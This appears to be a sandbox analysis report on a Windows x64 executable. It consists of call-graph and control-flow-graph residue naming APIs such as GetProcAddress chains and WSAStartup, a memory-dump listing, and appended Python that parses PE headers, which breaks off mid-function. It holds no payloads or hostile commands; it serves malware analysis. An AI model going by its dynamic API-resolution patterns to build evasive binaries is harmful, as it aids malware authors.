7ff67861f1ff 87774->87789 87779 7ff678625360 134 API calls 87776->87779 87781 7ff67862087d 87778->87781 87783 7ff67861f64b 87779->87783 87785 7ff678620c5c 87780->87785 87797 7ff678625e10 134 API calls 87781->87797 87792 7ff678625800 134 API calls 87782->87792 87793 7ff678626360 134 API calls 87783->87793 87795 7ff678626360 134 API calls 87785->87795 87802 7ff678625a00 134 API calls 87786->87802 87791 7ff678625a00 134 API calls 
87787->87791 87801 7ff678625800 134 API calls 87789->87801 87791->87662 87798 7ff67861e5ee 87792->87798 87799 7ff67861f67b 87793->87799 87800 7ff678620c89 87795->87800 87797->87643 87803 7ff6786251e0 134 API calls 87798->87803 87810 7ff678626360 134 API calls 87800->87810 87816 7ff67861ec1f 87802->87816 87804 7ff67861e607 87803->87804 87807 7ff678625360 134 API calls 87804->87807 87823 7ff67861e620 87807->87823 87810->87676 87822 7ff678625800 134 API calls 87816->87822 87840 7ff67861ec6e 87822->87840 87846 7ff678625800 134 API calls 87840->87846 87852 7ff67861ecb6 87846->87852 88017 7ff678623f47 88016->88017 88018 7ff678623ec2 88016->88018 88019 7ff678625360 134 API calls 88017->88019 88020 7ff678625360 134 API calls 88018->88020 88021 7ff678623f6b 88019->88021 88022 7ff678623edd 88020->88022 88023 7ff678626360 134 API calls 88021->88023 88024 7ff678625c30 134 API calls 88022->88024 88028 7ff678623fa2 memcpy_s 88023->88028 88026 7ff678623f0e 88024->88026 88025 7ff678625360 134 API calls 88027 7ff678624034 88025->88027 88026->88017 88029 7ff678625c30 134 API calls 88026->88029 88030 7ff678626360 134 API calls 88027->88030 88028->88025 88029->88017 88031 7ff678624064 88030->88031 88032 7ff678626360 134 API calls 88031->88032 88033 7ff678624091 88032->88033 88034 7ff678625360 134 API calls 88033->88034 88036 7ff6786240ae 88034->88036 88035 7ff6786241be 88037 7ff678626020 134 API calls 88035->88037 88036->88035 88038 7ff678624112 88036->88038 88346 7ff67869b8ac 98 API calls 4 library calls 88036->88346 88045 7ff678624229 88037->88045 88040 7ff678613530 134 API calls 88038->88040 88154 7ff6786134f0 134 API calls 88153->88154 88155 7ff678624f16 88154->88155 88155->87248 88156->87255 88157->87258 88158->87258 88159->87258 88161 7ff6786134f0 134 API calls 88160->88161 88162 7ff678625570 88161->88162 88163 7ff6786135a0 134 API calls 88162->88163 88164 7ff678625598 88163->88164 88165 7ff678613530 134 API calls 88164->88165 88166 7ff67861bd92 88165->88166 88167 7ff67861a3a0 
88166->88167 88168 7ff67861a3ab 88167->88168 88170 7ff67861a3c6 88167->88170 88169 7ff6786134f0 134 API calls 88168->88169 88169->88170 88170->87264 88176 7ff67862538d 88171->88176 88172 7ff6786134f0 134 API calls 88173 7ff678625481 88172->88173 88174 7ff67861a3a0 134 API calls 88173->88174 88175 7ff67862548c 88174->88175 88177 7ff67861a3a0 134 API calls 88175->88177 88176->88172 88181 7ff678625464 memcpy_s 88176->88181 88178 7ff678625497 88177->88178 88179 7ff6786254aa 88178->88179 88182 7ff67861a3a0 134 API calls 88178->88182 88180 7ff6786135a0 134 API calls 88179->88180 88180->88181 88181->87266 88182->88179 88184 7ff6786134f0 134 API calls 88183->88184 88185 7ff6786256b7 88184->88185 88186 7ff6786135a0 134 API calls 88185->88186 88187 7ff6786256df 88186->88187 88188 7ff678625742 88187->88188 88326 7ff67869b8ac 98 API calls 4 library calls 88187->88326 88189 7ff6786134f0 134 API calls 88188->88189 88193 7ff67862574d 88188->88193 88189->88193 88191 7ff67868a9f0 swprintf 8 API calls 88192 7ff6786257f0 88191->88192 88192->87268 88193->88191 88195 7ff6786134f0 134 API calls 88194->88195 88196 7ff678625c69 88195->88196 88197 7ff6786135a0 134 API calls 88196->88197 88198 7ff678625c91 88197->88198 88199 7ff67861a3a0 134 API calls 88198->88199 88200 7ff678625ce2 88198->88200 88199->88200 88200->87270 88202 7ff6786134f0 134 API calls 88201->88202 88209 7ff67862520e 88202->88209 88203 7ff67861a3a0 134 API calls 88204 7ff6786252a4 88203->88204 88205 7ff67861a3a0 134 API calls 88204->88205 88206 7ff6786252b9 88205->88206 88207 7ff6786135a0 134 API calls 88206->88207 88208 7ff6786252fd memcpy_s 88207->88208 88208->87276 88209->88203 88211 7ff6786134f0 134 API calls 88210->88211 88212 7ff67862584d 88211->88212 88213 7ff6786135a0 134 API calls 88212->88213 88214 7ff678625875 88213->88214 88215 7ff67861c346 88214->88215 88216 7ff67861a3a0 134 API calls 88214->88216 88215->87293 88216->88215 88218 7ff6786134f0 134 API calls 88217->88218 88219 7ff678625d49 88218->88219 88220 
7ff6786135a0 134 API calls 88219->88220 88221 7ff678625d71 88220->88221 88222 7ff678625dc2 88221->88222 88223 7ff67861a3a0 134 API calls 88221->88223 88222->87307 88223->88222 88225 7ff6786134f0 134 API calls 88224->88225 88226 7ff678625a52 88225->88226 88227 7ff6786135a0 134 API calls 88226->88227 88228 7ff678625a7a 88227->88228 88229 7ff678625ad0 88228->88229 88230 7ff67861a3a0 134 API calls 88228->88230 88231 7ff678625b3a 88229->88231 88232 7ff6786134f0 134 API calls 88229->88232 88230->88229 88233 7ff6786134f0 134 API calls 88231->88233 88232->88231 88234 7ff678625b6a 88233->88234 88235 7ff6786134f0 134 API calls 88234->88235 88240 7ff678625b7f 88235->88240 88236 7ff678625c04 88237 7ff67868a9f0 swprintf 8 API calls 88236->88237 88238 7ff67861c542 88237->88238 88238->87338 88239 7ff67861a3a0 134 API calls 88239->88240 88240->88236 88240->88239 88242 7ff6786134f0 134 API calls 88241->88242 88243 7ff67862606d 88242->88243 88244 7ff6786135a0 134 API calls 88243->88244 88245 7ff678626095 88244->88245 88246 7ff6786260e6 88245->88246 88247 7ff67861a3a0 134 API calls 88245->88247 88248 7ff67861a3a0 134 API calls 88246->88248 88247->88246 88249 7ff67861c70e 88248->88249 88250 7ff6786262b0 88249->88250 88251 7ff6786134f0 134 API calls 88250->88251 88252 7ff6786262d4 88251->88252 88253 7ff6786135a0 134 API calls 88252->88253 88254 7ff6786262fc 88253->88254 88255 7ff67861a3a0 134 API calls 88254->88255 88256 7ff67862634b 88255->88256 88256->87351 88258 7ff6786134f0 134 API calls 88257->88258 88259 7ff678626399 88258->88259 88260 7ff6786135a0 134 API calls 88259->88260 88261 7ff6786263c1 88260->88261 88262 7ff678626412 88261->88262 88263 7ff67861a3a0 134 API calls 88261->88263 88262->87355 88263->88262 88265 7ff6786134f0 134 API calls 88264->88265 88266 7ff67862594d 88265->88266 88267 7ff6786135a0 134 API calls 88266->88267 88269 7ff678625975 88267->88269 88268 7ff67861cc0e 88268->87392 88269->88268 88270 7ff67861a3a0 134 API calls 88269->88270 88270->88268 88272 
7ff6786134f0 134 API calls 88271->88272 88273 7ff678626169 88272->88273 88274 7ff6786135a0 134 API calls 88273->88274 88275 7ff678626191 88274->88275 88276 7ff67861d8cd 88275->88276 88277 7ff67861a3a0 134 API calls 88275->88277 88276->87496 88277->88276 88279 7ff6786134f0 134 API calls 88278->88279 88280 7ff678625e53 88279->88280 88281 7ff6786135a0 134 API calls 88280->88281 88282 7ff678625e7b 88281->88282 88283 7ff678625ecc 88282->88283 88284 7ff67861a3a0 134 API calls 88282->88284 88283->87551 88284->88283 88286 7ff6786134f0 134 API calls 88285->88286 88287 7ff6786255fc 88286->88287 88288 7ff6786135a0 134 API calls 88287->88288 88289 7ff678625624 88288->88289 88290 7ff678613530 134 API calls 88289->88290 88291 7ff67862563b 88290->88291 88291->87565 88311 7ff678613540 88309->88311 88313 7ff678613569 88311->88313 88345 7ff67864a910 134 API calls 88311->88345 88313->87320 88314->87325 88315->87337 88316->87337 88317->87332 88318->87730 88321->87744 88326->88188 88346->88038 88364 7ff67861151b 88363->88364 88367 7ff678611534 88363->88367 88375 7ff67869b8ac 98 API calls 4 library calls 88364->88375 88366 7ff67861155a 88369 7ff6786157e0 98 API calls 88366->88369 88367->88366 88376 7ff67869b8ac 98 API calls 4 library calls 88367->88376 88370 7ff67861156e 88369->88370 88371 7ff67861158f 88370->88371 88377 7ff67869b8ac 98 API calls 4 library calls 88370->88377 88373 7ff67868a9f0 swprintf 8 API calls 88371->88373 88374 7ff6785dcb6b 88373->88374 88374->87074 88374->87078 88375->88367 88376->88366 88377->88371 88378->87213 88379->87215 88380->87223 88381 7ff6785f52e0 88382 7ff6785f5311 88381->88382 88386 7ff6785f5364 88381->88386 88383 7ff6785f51e0 4 API calls 88382->88383 88383->88386 88384 7ff67868a9f0 swprintf 8 API calls 88385 7ff6785f5500 88384->88385 88387 7ff6785f51e0 4 API calls 88386->88387 88390 7ff6785f536d 88386->88390 88388 7ff6785f5404 88387->88388 88389 7ff6785f51e0 4 API calls 88388->88389 88388->88390 88389->88388 88390->88384 88391 7ff6785fb080 88392 
7ff6785fb0af 88391->88392 88397 7ff6785fb08e 88391->88397 88394 7ff6786162c0 134 API calls 88392->88394 88393 7ff6785fb0e7 88395 7ff6785fb0bb 88394->88395 88395->88397 88398 7ff6785fb0c7 GetProcAddress 88395->88398 88396 7ff6785fb09f SetCurrentProcessExplicitAppUserModelID 88396->88393 88397->88393 88397->88396 88398->88397 88399 7ff6785d51df RegisterClipboardFormatA 88426 7ff6785dd100 88399->88426 88402 7ff6786162c0 134 API calls 88403 7ff6785d520d 88402->88403 88404 7ff6786162c0 134 API calls 88403->88404 88405 7ff6785d521c 88404->88405 88406 7ff6786162c0 134 API calls 88405->88406 88407 7ff6785d522b GetProcAddress GetProcAddress 88406->88407 88409 7ff6785d5268 GetProcAddress 88407->88409 88411 7ff6785d5288 GetProcAddress GetProcAddress GetProcAddress 88409->88411 88413 7ff6785d52e7 GetProcAddress 88411->88413 88415 7ff6785d5307 GetProcAddress GetProcAddress 88413->88415 88417 7ff6785d5348 88415->88417 88445 7ff678611020 88417->88445 88420 7ff6785d5368 88421 7ff678612890 134 API calls 88420->88421 88422 7ff6785d537b MessageBoxA 88421->88422 88423 7ff6785d539e 88422->88423 88424 7ff67868a9f0 swprintf 8 API calls 88423->88424 88425 7ff6785d53ae 88424->88425 88427 7ff6785dd114 88426->88427 88428 7ff6785d5201 88426->88428 88429 7ff6786162c0 134 API calls 88427->88429 88428->88402 88430 7ff6785dd127 88429->88430 88431 7ff6785dd12f GetProcAddress 88430->88431 88432 7ff6785dd176 88430->88432 88433 7ff6785dd181 FreeLibrary 88431->88433 88434 7ff6785dd14b 88431->88434 88432->88433 88436 7ff6785dd190 FindResourceA 88433->88436 88435 7ff6785dd1f1 88434->88435 88434->88436 88438 7ff6785dd168 88434->88438 88435->88428 88450 7ff6786169b0 135 API calls 88435->88450 88436->88435 88437 7ff6785dd1b9 SizeofResource 88436->88437 88437->88435 88439 7ff6785dd1cb LoadResource 88437->88439 88438->88437 88440 7ff6785dd174 88438->88440 88439->88435 88441 7ff6785dd1df LockResource 88439->88441 88440->88435 88441->88435 88443 7ff6785dd217 88443->88428 88451 7ff6786169b0 135 API calls 
88443->88451 88446 7ff6786134f0 134 API calls 88445->88446 88447 7ff678611037 88446->88447 88452 7ff678614a20 88447->88452 88450->88443 88451->88428 88453 7ff6786134f0 134 API calls 88452->88453 88454 7ff6785d5354 CoInitialize 88453->88454 88454->88420 88455 7ff6785f6f7c 88456 7ff6785f77ce 88455->88456 88457 7ff6785f6f87 88455->88457 88459 7ff6785f51e0 4 API calls 88456->88459 88508 7ff6785f5520 GetDC 88457->88508 88460 7ff6785f7824 SetDlgItemTextA 88459->88460 88526 7ff67861b550 6 API calls 88460->88526 88462 7ff6785f77b4 88463 7ff6785f51e0 4 API calls 88462->88463 88466 7ff6785f7850 88463->88466 88464 7ff6785f6fa4 88464->88462 88465 7ff6786134f0 134 API calls 88464->88465 88467 7ff6785f6fd2 88465->88467 88468 7ff6786134f0 134 API calls 88466->88468 88491 7ff6785f68b4 88466->88491 88467->88462 88524 7ff6786a11ac 63 API calls 88467->88524 88469 7ff6785f7fd3 88468->88469 88471 7ff6785f802f 88469->88471 88473 7ff678614b00 134 API calls 88469->88473 88472 7ff678614b00 134 API calls 88471->88472 88475 7ff6785f8040 88472->88475 88474 7ff6785f8011 88473->88474 88474->88471 88527 7ff67869b8ac 98 API calls 4 library calls 88474->88527 88484 7ff6785f805e 88475->88484 88528 7ff67869b8ac 98 API calls 4 library calls 88475->88528 88476 7ff6785f6fee 88476->88462 88525 7ff6786a11ac 63 API calls 88476->88525 88480 7ff6785f84ac 88483 7ff67868a9f0 swprintf 8 API calls 88480->88483 88482 7ff6785f83b8 88482->88480 88486 7ff6785f51e0 4 API calls 88482->88486 88487 7ff6785f84c1 88483->88487 88499 7ff6785f80d0 88484->88499 88529 7ff6786a11ac 63 API calls 88484->88529 88530 7ff67869b8ac 98 API calls 4 library calls 88484->88530 88485 7ff67869b8ac 98 API calls 88485->88491 88486->88480 88489 7ff6786157e0 98 API calls 88489->88499 88490 7ff6785f851c 88535 7ff67869b8ac 98 API calls 4 library calls 88490->88535 88491->88482 88491->88485 88491->88490 88493 7ff6785f8150 GetDlgItem 88493->88499 88494 7ff6785f8535 88536 7ff6785d7a30 100 API calls _invalid_parameter_noinfo 88494->88536 88498 
7ff6785f853a 88499->88489 88499->88491 88499->88493 88504 7ff6785f81c0 88499->88504 88531 7ff67869b8ac 98 API calls 4 library calls 88499->88531 88532 7ff67869b8ac 98 API calls 4 library calls 88499->88532 88500 7ff6786157e0 98 API calls 88500->88504 88501 7ff6785f828e GetDlgItem 88501->88504 88504->88491 88504->88500 88504->88501 88505 7ff6785f832c GetDlgItem 88504->88505 88506 7ff6785f834c ScreenToClient 88504->88506 88533 7ff67869b8ac 98 API calls 4 library calls 88504->88533 88534 7ff67869b8ac 98 API calls 4 library calls 88504->88534 88505->88504 88506->88504 88507 7ff6785f8380 SetWindowPos 88506->88507 88507->88504 88509 7ff6785f5567 88508->88509 88510 7ff6786134f0 134 API calls 88509->88510 88511 7ff6785f5578 88510->88511 88512 7ff6786134f0 134 API calls 88511->88512 88513 7ff6785f5594 SetMapMode MapDialogRect SendMessageA SelectObject 88512->88513 88514 7ff6785f57a4 SelectObject ReleaseDC 88513->88514 88515 7ff6785f5606 88513->88515 88516 7ff6785f57c6 88514->88516 88517 7ff6785f560e GetTextExtentExPointA 88515->88517 88518 7ff67868a9f0 swprintf 8 API calls 88516->88518 88521 7ff6785f5728 88517->88521 88522 7ff6785f5656 88517->88522 88519 7ff6785f57e1 88518->88519 88519->88464 88520 7ff67869ecc0 62 API calls 88520->88522 88521->88514 88522->88520 88522->88521 88523 7ff6785f573c GetTextExtentExPointA 88522->88523 88523->88521 88523->88522 88524->88476 88525->88476 88526->88466 88527->88471 88528->88484 88529->88484 88530->88484 88531->88493 88532->88499 88533->88501 88534->88504 88535->88494 88536->88498 88537 7ff678609090 88544 7ff67860cff0 RegCloseKey 88537->88544 88539 7ff678609098 88540 7ff6786090b1 88539->88540 88541 7ff6786125d0 98 API calls 88539->88541 88542 7ff6786090a5 88541->88542 88542->88540 88545 7ff6785faaf0 88542->88545 88544->88539 88546 7ff6785fab62 88545->88546 88547 7ff6785fab0c 88545->88547 88548 7ff67868a9f0 swprintf 8 API calls 88546->88548 88547->88546 88549 7ff6785fab17 88547->88549 88550 7ff6785fab6f 88548->88550 88574 7ff67860dd90 
139 API calls swprintf 88549->88574 88550->88540 88552 7ff6785fab1c 88553 7ff6785fab75 88552->88553 88554 7ff6785fab20 CoCreateInstance 88552->88554 88555 7ff67868a9f0 swprintf 8 API calls 88553->88555 88554->88546 88556 7ff6785fab4a 88554->88556 88557 7ff6785fab82 wcsftime 88555->88557 88556->88546 88558 7ff6785faba6 CoCreateInstance 88557->88558 88559 7ff6785fac10 88558->88559 88560 7ff6785faefa 88558->88560 88559->88560 88561 7ff6785fac50 CoCreateInstance 88559->88561 88564 7ff67868a9f0 swprintf 8 API calls 88560->88564 88561->88560 88562 7ff6785fac7e 88561->88562 88575 7ff67860e020 139 API calls swprintf 88562->88575 88565 7ff6785fafcb 88564->88565 88565->88540 88567 7ff6785fadc8 88567->88560 88568 7ff6785fae07 CoCreateInstance 88567->88568 88568->88560 88570 7ff6785fae35 88568->88570 88569 7ff6785fb0f0 170 API calls 88569->88570 88570->88569 88572 7ff6785fae7f 88570->88572 88571 7ff6785fac83 88571->88567 88576 7ff6785fb0f0 88571->88576 88572->88560 88573 7ff6785faecc CoCreateInstance 88572->88573 88573->88560 88574->88552 88575->88571 88577 7ff6785fb195 GetModuleFileNameA 88576->88577 88578 7ff6785fb117 88576->88578 88579 7ff6785fb1b3 88577->88579 88583 7ff6785fb120 swprintf 88577->88583 88578->88579 88578->88583 88580 7ff67861a3a0 134 API calls 88579->88580 88581 7ff6785fb18e 88580->88581 88582 7ff6785fb1dc CoCreateInstance 88581->88582 88601 7ff6785fb193 88581->88601 88623 7ff67860cc60 88581->88623 88584 7ff6785fb206 88582->88584 88593 7ff6785fb230 88582->88593 88587 7ff678612890 134 API calls 88583->88587 88591 7ff6785fb23f 88584->88591 88592 7ff6785fb21c 88584->88592 88589 7ff6785fb16b 88587->88589 88588 7ff6785fb1d4 88633 7ff67860cff0 RegCloseKey 88588->88633 88621 7ff67869e168 117 API calls 3 library calls 88589->88621 88597 7ff67861a3a0 134 API calls 88591->88597 88596 7ff678612610 134 API calls 88592->88596 88598 7ff67868a9f0 swprintf 8 API calls 88593->88598 88595 7ff6785fb17d 88595->88593 88622 7ff67869d968 90 API calls _invalid_parameter_noinfo 
[Call graph rendering residue: the nodes are function addresses in the 7ff6785f...-7ff6786a... range, annotated with the APIs they call, and the text is only the edge list of the rendered graph. APIs visible in it include a long chain of GetProcAddress resolutions (7ff67860e2ff through 7ff67860e82f) followed by WSAStartup, plus SendMessageA, SendDlgItemMessageA, SetDlgItemTextA, GetDlgItem, DestroyWindow, CreateDialogParamA, ShowWindow, SetActiveWindow, SetTimer, KillTimer, MessageBoxA, MessageBeep, LoadIconA, GetDesktopWindow, GetWindowRect, MoveWindow, SetWindowPos, ScreenToClient, GetWindowLongPtrA, SetWindowLongPtrA, SetWindowTextA, swprintf, memcpy_s and _invalid_parameter_noinfo. The graph layout itself is not recoverable from the text.]

                      Control-flow Graph

                      • Executed
                      • Not Executed
[Control-flow graph rendering residue for the function at 7ff67861bd50: the text lists basic-block address ranges (starting at 7ff67861bd50-7ff67861bee3) with the call targets inside each block (e.g. 7ff678625360, 7ff678624e40, 7ff678625a00, 7ff678625800, 7ff67869b8ac, 7ff678606f20, 7ff678612890, 7ff678613590) and numbered block-to-block edges. The block layout and the executed/not-executed colouring from the legend above are not recoverable from the text.]
7ff678624e50 call 7ff678625c30 call 7ff678625680 call 7ff678624e50 call 7ff678625d10 call 7ff6786134f0 777->1182 817 7ff67862073a-7ff6786208b8 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 781->817 818 7ff6786206ce-7ff678620735 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 781->818 821 7ff678620a9a-7ff678620a9d 794->821 822 7ff678620b24-7ff678620b31 call 7ff678606f20 794->822 795->794 803 7ff6786208e4-7ff67862091c call 7ff6786251e0 call 7ff678625360 795->803 849 7ff678620a2d-7ff678620a82 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 803->849 850 7ff678620922-7ff678620a28 call 7ff678624e40 * 3 call 7ff678625a00 call 7ff678624e40 * 3 call 7ff678625a00 803->850 879 7ff67861fe5a-7ff678620258 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678625680 call 7ff6786262b0 call 7ff6786255e0 call 7ff678624e50 call 7ff678625c30 call 7ff678624e50 call 7ff678625d10 call 7ff6786134f0 call 7ff678626210 call 7ff6786262b0 call 7ff678624e50 call 7ff678625c30 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 * 4 call 7ff678625a00 call 7ff678624e40 * 3 call 7ff678624e50 call 7ff678625a00 call 7ff678626210 call 7ff678625680 804->879 880 7ff67861f39d-7ff67861f3a0 804->880 805->804 814 7ff67861ee5d 805->814 814->770 817->773 818->817 821->822 833 7ff678620aa3-7ff678620b1f call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 821->833 857 7ff678620b37-7ff678620b3a 822->857 858 7ff678620cb6-7ff678620cd1 822->858 828->829 837 7ff67861f33e-7ff67861f341 829->837 838 7ff67861f0e4-7ff67861f0e7 829->838 833->822 837->804 851 7ff67861f3ab-7ff67861f576 call 7ff678625360 call 7ff678625680 call 
7ff6786262b0 call 7ff6786255e0 call 7ff678624e50 call 7ff678625c30 call 7ff678624e50 call 7ff678625d10 call 7ff678626210 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678624e50 call 7ff678625c30 call 7ff678625680 call 7ff678625360 call 7ff678624e40 call 7ff678625c30 837->851 838->837 852 7ff67861f0ed-7ff67861f339 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678625f20 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff6786262b0 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678625f20 call 7ff678624e40 call 7ff678626360 838->852 844->770 849->794 850->849 907 7ff67861f57b-7ff67861f617 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678625f20 call 7ff678624e40 call 7ff678626360 851->907 852->837 857->858 868 7ff678620b40-7ff678620cb1 call 7ff6786251e0 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 * 4 call 7ff678625a00 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 857->868 868->858 879->753 1327 7ff67862025e-7ff67862067a call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678625360 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 call 7ff678624e40 call 7ff678625e10 879->1327 880->879 893 7ff67861f3a6 880->893 893->907 907->879 1047 7ff67861f61d-7ff67861f9e9 call 7ff6786251e0 
call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626020 call 7ff678624e40 call 7ff678626020 call 7ff678625360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 call 7ff678624e40 call 7ff678626360 907->1047 1384 7ff67861f9eb-7ff67861fa60 call 7ff678624e50 call 7ff678625f20 call 7ff678624e40 call 7ff678626020 1047->1384 1385 7ff67861fa65-7ff67861fe55 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678625360 call 7ff6786255e0 call 7ff6786262b0 call 7ff678624e50 call 7ff678625d10 call 7ff6786134f0 call 7ff678625680 call 7ff6786262b0 call 7ff678624e50 call 7ff678625c30 call 7ff678625680 * 2 call 7ff678624e50 * 4 call 7ff678625a00 call 7ff678624e50 * 2 call 7ff678625800 call 7ff678626210 call 7ff6786251e0 call 7ff678625360 call 7ff678624e40 call 7ff678626360 call 7ff678624e50 call 7ff678624e40 call 7ff678625800 call 7ff678624e40 * 3 call 7ff678625a00 1047->1385 1182->732 1327->753 1384->1385 1385->879
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
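The dump listing above gives the module base (Offset 00007FF6785D0000, "based on PE: true") and the start address of each dumped region. A practitioner checking such a dump wants to know which section each region belongs to, whether the module is loaded at its preferred ImageBase, and whether it was built with ASLR/NX. The Python below is an added example, not code from the Joe Sandbox report or from PuTTY: it parses the DOS, COFF, optional and section headers of an in-memory PE32+/PE32 image and maps a region start address to a section. The header it parses is constructed inline; the section names, sizes and DllCharacteristics are assumptions chosen so that the section RVAs line up with the region addresses in the listing, not values read from the dropped binary.

```python
"""Map memory-dump regions of a loaded module to its PE sections (added example)."""
import struct

# IMAGE_DLLCHARACTERISTICS bits relevant when judging a dumped module
DYNAMIC_BASE = 0x0040
HIGH_ENTROPY_VA = 0x0020
NX_COMPAT = 0x0100
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_pe_image(blob: bytes) -> dict:
    """Parse headers from an image as laid out in memory (headers at offset 0)."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x20B:            # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", blob, opt + 24)[0]
    elif magic == 0x10B:          # PE32: BaseOfData at +24, 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]
    size_of_image = struct.unpack_from("<I", blob, opt + 56)[0]
    size_of_headers = struct.unpack_from("<I", blob, opt + 60)[0]
    dll_chars = struct.unpack_from("<H", blob, opt + 70)[0]
    sections, pos = [], opt + opt_size
    for _ in range(nsections):          # 40-byte IMAGE_SECTION_HEADER entries
        name, vsize, rva, _, _, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", blob, pos)
        sections.append({"name": name.rstrip(b"\0").decode(), "rva": rva, "vsize": vsize,
                         "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE)})
        pos += 40
    return {"machine": machine, "pe32plus": magic == 0x20B, "image_base": image_base,
            "entry_rva": entry_rva, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers, "dll_characteristics": dll_chars,
            "sections": sections}


def locate_region(info: dict, module_base: int, region_start: int) -> dict:
    """Resolve a dumped region's start address to a section of the module at module_base."""
    rva = region_start - module_base
    if rva < 0 or rva >= info["size_of_image"]:
        raise ValueError(f"region {region_start:#x} lies outside the module (RVA {rva:#x})")
    relocated = module_base != info["image_base"]   # True when the loader moved the image
    if rva < info["size_of_headers"]:
        return {"rva": rva, "section": "headers", "relocated": relocated}
    for s in info["sections"]:
        if s["rva"] <= rva < s["rva"] + s["vsize"]:
            return {"rva": rva, "section": s["name"], "relocated": relocated}
    return {"rva": rva, "section": None, "relocated": relocated}


def hardening_flags(info: dict) -> dict:
    dc = info["dll_characteristics"]
    return {"aslr": bool(dc & DYNAMIC_BASE), "high_entropy_va": bool(dc & HIGH_ENTROPY_VA),
            "nx": bool(dc & NX_COMPAT)}


def build_sample_image() -> bytes:
    """Constructed PE32+ header (assumed layout, not the dropped binary's real one)."""
    sections = [(b".text", 0x1000, 0xE9000, 0x60000020),     # -> 0x7FF6785D1000
                (b".rdata", 0xEA000, 0x41000, 0x40000040),   # -> 0x7FF6786BA000
                (b".data", 0x12B000, 0x15000, 0xC0000040)]   # -> 0x7FF6786FB000
    e_lfanew, opt_size = 0x80, 240
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 16, 0x12345)                 # AddressOfEntryPoint (arbitrary)
    struct.pack_into("<Q", opt, 24, 0x7FF6785D0000)          # ImageBase, as in the listing
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)          # SectionAlignment, FileAlignment
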